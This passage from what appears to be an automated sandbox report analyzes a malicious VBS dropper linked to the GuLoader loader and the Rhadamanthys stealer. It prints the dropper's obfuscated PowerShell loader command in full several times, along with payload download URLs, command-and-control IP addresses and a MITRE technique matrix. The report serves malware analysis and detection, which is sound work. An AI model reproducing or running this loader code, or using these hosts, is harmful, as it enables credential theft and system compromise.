'Mu$EpgShlJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$anhemitonic63='unclever';;$brescian='debauchedly';;$thunderhead='reservationsdatoers';;$graadens='dogernes';;$eksplosionsmotorernes47=$host.name; function resubmerging($dagsproduktionernestjeneste){if ($eksplosionsmotorernes47) {$satirizers='flippermaskiners';$heterogenes=2;$dagsproduktionerne=$heterogenes}do{$laboratorieplanlgningers+=$dagsproduktionernestjeneste[$dagsproduktionerne];$dagsproduktionerne+=3} until(!$dagsproduktionernestjeneste[$dagsproduktionerne])$laboratorieplanlgningers}function impalement($lucern179){ .($raaderet113) ($lucern179)}$aabningshaand=resubmerging 'sun,resltsy. rw';$aabningshaand+=resubmerging 'bee.lbsycsplkai ceshn t';$stikkelsbrbens127=resubmerging 'fomamoetzorifyl pl dare/';$telemetered=resubmerging 'att slgus s1 i2';$dagsproduktionernendows='pl[acnp eorteu.nos ae,mruavs,is c pemaps o yidon dtb m a cn.jamagunejerlo]ca: :sks eetacblu urpiibit aybep orinom telotacfao.nl b=sc$intmie lreetemkuevitp.eudrliek d';$stikkelsbrbens127+=resubmerging 's 5 r.,a0sn pe(f w miannarddiovswres benapta pl1 r0ra. e0li; o crwjeiunndi6ne4fo;fo pixre6f 4r ; d f rbuv h:lk1hi3 t1 u.ep0 h) s stg eerac.ekbuo t/ 2 g0op1 .0fe0sc1 o0sq1ne blf pi urfoe fanoalxfr/,r1 .3b,1.i. s0';$centas=resubmerging ',ou s se crsc- ma g dehyn ut';$morbidise=resubmerging 'ovh ntu ttiptrsdr:ra/ou/ ,w sw nwfi. ttc dune bjdibta.kic so .m v/sukpopel/hae kppei.il ea rc lhcrnswa.t. ,qmuxefdpu>.ah pt bttrprns a:co/sv/ lw dwk.ws . fudt asg eprngigt imon lemeehorv sca. bcufobrm t/kakscmwo/ oenepauijalhaaricfihhonleaak.olqmux cd';$dixenite=resubmerging 'sc>';$raaderet113=resubmerging ' ,i epax';$feminologisk='bestrr';$klerum='\enspndervognes.eks';impalement (resubmerging ' k$ sgn lino bgiaprl c:unra a ,bovad lgedrvererremted re.e=o,$ le ,n fv c: bascp .pqudlrafotprask+b.$spkfelu e nrlausem');impalement (resubmerging ' s$ gc.lkoo pbucas lo,:diglaailsmatvar oo gm ,e nnvitoavi=ta$fomo oeururb biredspi ssane p.prsinp el pisktko( d$b d fi oxine enc iggtudeun)');impalement (resubmerging $dagsproduktionernendows);$morbidise=$gastromenia[0];$parfumens=(resubmerging 'lr$mog klbio ebugafil p:p dhyehec ,aill lcsciskf dydiibrnneg =lan demaw -jeo hbssj ce fcfltra uss.yp statunefumkr.h $ uan ascbnona.i jnh gyosn h eal asknt d');impalement ($parfumens);impalement (resubmerging 'c $ addee jc yas,lvect,ik.fk,y biddntig p.trhaneunas.dh e rr usim[ d$ sc .e snuntm,a.es g]i,=bl$prstotpaipikvikn,e ultrsekbarrsvb iecun s a1ud2 a7');$nonappreciative=resubmerging 'im$kadpie .cfia .lincgui,nf .yukiasn g.d. sd o.lweunsuluno rap dulfc iinlefeti(ty$ ,m eovarkabenibrdcaisasilefl,fr$s.s oojak tlt e.ptant feunnan7k,6 o)';$sokletten76=$rabaldermde;impalement (resubmerging ',e$t glil vomab baaplum: s ,t vores ,ntui.xn.ug e rnl,s e=.a(patsnel.sstttr-gepura,etcohe d $kysmao hk .libed tcht sev,nra7re6va)');while (!$stosningens) {impalement (resubmerging 'mu$epgshl
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$anhemitonic63='unclever';;$brescian='debauchedly';;$thunderhead='reservationsdatoers';;$graadens='dogernes';;$eksplosionsmotorernes47=$host.name; function resubmerging($dagsproduktionernestjeneste){if ($eksplosionsmotorernes47) {$satirizers='flippermaskiners';$heterogenes=2;$dagsproduktionerne=$heterogenes}do{$laboratorieplanlgningers+=$dagsproduktionernestjeneste[$dagsproduktionerne];$dagsproduktionerne+=3} until(!$dagsproduktionernestjeneste[$dagsproduktionerne])$laboratorieplanlgningers}function impalement($lucern179){ .($raaderet113) ($lucern179)}$aabningshaand=resubmerging 'sun,resltsy. rw';$aabningshaand+=resubmerging 'bee.lbsycsplkai ceshn t';$stikkelsbrbens127=resubmerging 'fomamoetzorifyl pl dare/';$telemetered=resubmerging 'att slgus s1 i2';$dagsproduktionernendows='pl[acnp eorteu.nos ae,mruavs,is c pemaps o yidon dtb m a cn.jamagunejerlo]ca: :sks eetacblu urpiibit aybep orinom telotacfao.nl b=sc$intmie lreetemkuevitp.eudrliek d';$stikkelsbrbens127+=resubmerging 's 5 r.,a0sn pe(f w miannarddiovswres benapta pl1 r0ra. e0li; o crwjeiunndi6ne4fo;fo pixre6f 4r ; d f rbuv h:lk1hi3 t1 u.ep0 h) s stg eerac.ekbuo t/ 2 g0op1 .0fe0sc1 o0sq1ne blf pi urfoe fanoalxfr/,r1 .3b,1.i. s0';$centas=resubmerging ',ou s se crsc- ma g dehyn ut';$morbidise=resubmerging 'ovh ntu ttiptrsdr:ra/ou/ ,w sw nwfi. ttc dune bjdibta.kic so .m v/sukpopel/hae kppei.il ea rc lhcrnswa.t. ,qmuxefdpu>.ah pt bttrprns a:co/sv/ lw dwk.ws . fudt asg eprngigt imon lemeehorv sca. bcufobrm t/kakscmwo/ oenepauijalhaaricfihhonleaak.olqmux cd';$dixenite=resubmerging 'sc>';$raaderet113=resubmerging ' ,i epax';$feminologisk='bestrr';$klerum='\enspndervognes.eks';impalement (resubmerging ' k$ sgn lino bgiaprl c:unra a ,bovad lgedrvererremted re.e=o,$ le ,n fv c: bascp .pqudlrafotprask+b.$spkfelu e nrlausem');impalement (resubmerging ' s$ gc.lkoo pbucas lo,:diglaailsmatvar oo gm ,e nnvitoavi=ta$fomo oeururb biredspi ssane p.prsinp el pisktko( d$b d fi oxine enc iggtudeun)');impalement (resubmerging $dagsproduktionernendows);$morbidise=$gastromenia[0];$parfumens=(resubmerging 'lr$mog klbio ebugafil p:p dhyehec ,aill lcsciskf dydiibrnneg =lan demaw -jeo hbssj ce fcfltra uss.yp statunefumkr.h $ uan ascbnona.i jnh gyosn h eal asknt d');impalement ($parfumens);impalement (resubmerging 'c $ addee jc yas,lvect,ik.fk,y biddntig p.trhaneunas.dh e rr usim[ d$ sc .e snuntm,a.es g]i,=bl$prstotpaipikvikn,e ultrsekbarrsvb iecun s a1ud2 a7');$nonappreciative=resubmerging 'im$kadpie .cfia .lincgui,nf .yukiasn g.d. sd o.lweunsuluno rap dulfc iinlefeti(ty$ ,m eovarkabenibrdcaisasilefl,fr$s.s oojak tlt e.ptant feunnan7k,6 o)';$sokletten76=$rabaldermde;impalement (resubmerging ',e$t glil vomab baaplum: s ,t vores ,ntui.xn.ug e rnl,s e=.a(patsnel.sstttr-gepura,etcohe d $kysmao hk .libed tcht sev,nra7re6va)');while (!$stosningens) {impalement (resubmerging 'mu$epgshl
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$anhemitonic63='unclever';;$brescian='debauchedly';;$thunderhead='reservationsdatoers';;$graadens='dogernes';;$eksplosionsmotorernes47=$host.name; function resubmerging($dagsproduktionernestjeneste){if ($eksplosionsmotorernes47) {$satirizers='flippermaskiners';$heterogenes=2;$dagsproduktionerne=$heterogenes}do{$laboratorieplanlgningers+=$dagsproduktionernestjeneste[$dagsproduktionerne];$dagsproduktionerne+=3} until(!$dagsproduktionernestjeneste[$dagsproduktionerne])$laboratorieplanlgningers}function impalement($lucern179){ .($raaderet113) ($lucern179)}$aabningshaand=resubmerging 'sun,resltsy. rw';$aabningshaand+=resubmerging 'bee.lbsycsplkai ceshn t';$stikkelsbrbens127=resubmerging 'fomamoetzorifyl pl dare/';$telemetered=resubmerging 'att slgus s1 i2';$dagsproduktionernendows='pl[acnp eorteu.nos ae,mruavs,is c pemaps o yidon dtb m a cn.jamagunejerlo]ca: :sks eetacblu urpiibit aybep orinom telotacfao.nl b=sc$intmie lreetemkuevitp.eudrliek d';$stikkelsbrbens127+=resubmerging 's 5 r.,a0sn pe(f w miannarddiovswres benapta pl1 r0ra. e0li; o crwjeiunndi6ne4fo;fo pixre6f 4r ; d f rbuv h:lk1hi3 t1 u.ep0 h) s stg eerac.ekbuo t/ 2 g0op1 .0fe0sc1 o0sq1ne blf pi urfoe fanoalxfr/,r1 .3b,1.i. s0';$centas=resubmerging ',ou s se crsc- ma g dehyn ut';$morbidise=resubmerging 'ovh ntu ttiptrsdr:ra/ou/ ,w sw nwfi. ttc dune bjdibta.kic so .m v/sukpopel/hae kppei.il ea rc lhcrnswa.t. ,qmuxefdpu>.ah pt bttrprns a:co/sv/ lw dwk.ws . fudt asg eprngigt imon lemeehorv sca. bcufobrm t/kakscmwo/ oenepauijalhaaricfihhonleaak.olqmux cd';$dixenite=resubmerging 'sc>';$raaderet113=resubmerging ' ,i epax';$feminologisk='bestrr';$klerum='\enspndervognes.eks';impalement (resubmerging ' k$ sgn lino bgiaprl c:unra a ,bovad lgedrvererremted re.e=o,$ le ,n fv c: bascp .pqudlrafotprask+b.$spkfelu e nrlausem');impalement (resubmerging ' s$ gc.lkoo pbucas lo,:diglaailsmatvar oo gm ,e nnvitoavi=ta$fomo oeururb biredspi ssane p.prsinp el pisktko( d$b d fi oxine enc iggtudeun)');impalement (resubmerging $dagsproduktionernendows);$morbidise=$gastromenia[0];$parfumens=(resubmerging 'lr$mog klbio ebugafil p:p dhyehec ,aill lcsciskf dydiibrnneg =lan demaw -jeo hbssj ce fcfltra uss.yp statunefumkr.h $ uan ascbnona.i jnh gyosn h eal asknt d');impalement ($parfumens);impalement (resubmerging 'c $ addee jc yas,lvect,ik.fk,y biddntig p.trhaneunas.dh e rr usim[ d$ sc .e snuntm,a.es g]i,=bl$prstotpaipikvikn,e ultrsekbarrsvb iecun s a1ud2 a7');$nonappreciative=resubmerging 'im$kadpie .cfia .lincgui,nf .yukiasn g.d. sd o.lweunsuluno rap dulfc iinlefeti(ty$ ,m eovarkabenibrdcaisasilefl,fr$s.s oojak tlt e.ptant feunnan7k,6 o)';$sokletten76=$rabaldermde;impalement (resubmerging ',e$t glil vomab baaplum: s ,t vores ,ntui.xn.ug e rnl,s e=.a(patsnel.sstttr-gepura,etcohe d $kysmao hk .libed tcht sev,nra7re6va)');while (!$stosningens) {impalement (resubmerging 'mu$epgshlJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 0000000B.00000003.2196496080.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2200198942.0000000021050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2192874424.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 0000000B.00000003.2196496080.0000000003880000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2200198942.0000000021050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2192874424.0000000000100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_05B6AB70 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,11_2_05B6AB70

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information221
                        Scripting                        		Valid Accounts111
                        Windows Management Instrumentation                        		221
                        Scripting                        		411
                        Process Injection                        		1
                        Masquerading                        		21
                        Input Capture                        		321
                        Security Software Discovery                        		Remote Services21
                        Input Capture                        		11
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Command and Scripting Interpreter                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		241
                        Virtualization/Sandbox Evasion                        		LSASS Memory1
                        Process Discovery                        		Remote Desktop Protocol1
                        Archive Collected Data                        		1
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Exploitation for Client Execution                        		Logon Script (Windows)Logon Script (Windows)411
                        Process Injection                        		Security Account Manager241
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin SharesData from Network Shared Drive2
                        Ingress Tool Transfer                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        PowerShell                        		Login HookLogin Hook2
                        Obfuscated Files or Information                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Software Packing                        		LSA Secrets1
                        File and Directory Discovery                        		SSHKeylogging13
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading                        		Cached Domain Credentials213
                        System Information Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578226 Sample: 0iTxQouy7k.vbs Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 31 www.tdejb.com 2->31 33 tdejb.com 2->33 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected RHADAMANTHYS Stealer 2->43 45 5 other signatures 2->45 8 powershell.exe 18 2->8         started        11 wscript.exe 1 2->11         started        signatures3 process4 signatures5 47 Early bird code injection technique detected 8->47 49 Writes to foreign memory regions 8->49 51 Found suspicious powershell code related to unpacking or dynamic code loading 8->51 61 2 other signatures 8->61 13 msiexec.exe 1 6 8->13         started        16 conhost.exe 8->16         started        53 VBScript performs obfuscated calls to suspicious functions 11->53 55 Suspicious powershell command line found 11->55 57 Wscript starts Powershell (via cmd or directly) 11->57 59 Suspicious execution chain found 11->59 18 powershell.exe 14 18 11->18         started        21 WMIC.exe 1 11->21         started        process6 dnsIp7 67 Hides threads from debuggers 13->67 69 Switches to a custom stack to bypass stack traces 13->69 23 svchost.exe 13->23         started        35 tdejb.com 202.71.109.228, 443, 49731, 49738 TMVADS-APTM-VADSDCHostingMY Malaysia 18->35 71 Found suspicious powershell code related to unpacking or dynamic code loading 18->71 27 conhost.exe 18->27         started        73 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 21->73 29 conhost.exe 21->29         started        signatures8 process9 dnsIp10 37 45.149.241.141, 2023, 49739, 49757 UUNETUS Germany 23->37 63 System process connects to network (likely due to code injection or exploit) 23->63 65 Switches to a custom stack to bypass stack traces 23->65 signatures11

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        0iTxQouy7k.vbs16%VirustotalBrowse
                        0iTxQouy7k.vbs29%ReversingLabsScript-WScript.Trojan.GuLoader

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.tdejb.com0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.bin0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.bineT0%Avira URL Cloudsafe
                        http://tdejb.com0%Avira URL Cloudsafe
                        https://www.ftsengineers.com/km/Epilachna.qxd0%Avira URL Cloudsafe
                        https://www.tdejb.com/kp/Epilachna.qxd0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.bin.Tg0%Avira URL Cloudsafe
                        https://www.tdejb.com0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.bini0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        tdejb.com
                        		202.71.109.228
                        		truefalse
                          		unknown
                          www.tdejb.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://www.tdejb.com/ab/ab.binfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.tdejb.com/kp/Epilachna.qxdfalse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.tdejb.com/ab/ab.bineTmsiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.tdejb.compowershell.exe, 00000003.00000002.1952454378.0000016E68BED000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/pscore6lBpowershell.exe, 00000008.00000002.2088551763.0000000004E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.microsoftmsiexec.exe, 0000000A.00000003.2178558767.0000000000667000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2178501643.000000000062E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2203558932.000000000062E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2178435166.000000000062E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000003.00000002.1952454378.0000016E67B48000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.ftsengineers.com/km/Epilachna.qxdpowershell.exe, 00000003.00000002.1952454378.0000016E671A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1952454378.0000016E6848A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://tdejb.compowershell.exe, 00000003.00000002.1952454378.0000016E68BED000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://contoso.com/powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1980105016.0000016E76FF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000008.00000002.2113268820.0000000005E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://cloudflare-dns.com/dns-querysvchost.exefalse
                                                  		high
                                                  https://www.tdejb.com/ab/ab.bin.Tgmsiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://aka.ms/pscore68powershell.exe, 00000003.00000002.1952454378.0000016E66F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1952454378.0000016E66F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2088551763.0000000004E31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.tdejb.compowershell.exe, 00000003.00000002.1952454378.0000016E671A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1952454378.0000016E68B39000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2088551763.0000000004F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2085867731.00000000033D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.tdejb.com/ab/ab.binimsiexec.exe, 0000000A.00000002.2203269463.00000000005BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        45.149.241.141
                                                        		unknownGermany
                                                        		701UUNETUStrue
                                                        202.71.109.228
                                                        		tdejb.comMalaysia
                                                        		17971TMVADS-APTM-VADSDCHostingMYfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1578226
                                                        Start date and time:2024-12-19 12:46:23 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 8m 59s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
